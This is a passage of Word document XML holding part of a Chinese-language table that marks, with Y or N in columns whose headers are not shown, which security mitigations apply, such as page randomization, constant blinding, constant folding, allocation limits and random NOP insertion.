              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CDF792C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="29"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="71371D81" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="560"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17178D00" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>页面随机化</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7D88F1A4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="4" w:line="265" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Win32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>上的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>VirtualAlloc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09AB2D13" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06ECD533" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BBA7D8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2822EAA7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="470"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E90D2B2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74EFE22F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C51804" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="29"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="2A1A100E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A73C5B6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>不断折叠</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7674CE06" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A10C67E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="709BDBF6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="265266E0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="470"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4241789D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64BD05AF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429004EF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="29"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="19757CFB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E6AAA6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>持续致盲</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="602D79AB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BA18D61" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FB9B089" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B639A1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="470"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CDC8BB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F9A6F59" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22AE72C4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="29"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="09ECB78B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="280"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B48705D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>分配限制</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="350B8F0E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177BDBD0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05AC783B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448D35B7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="470"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="785295DA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="134BCD60" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E12950B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="29"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="2700F138" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5949FC3A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>随机插入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>NOP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="065E27C6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65287D37" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D58A037" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C0733C6" w14:textId="0E72B608" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="410"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
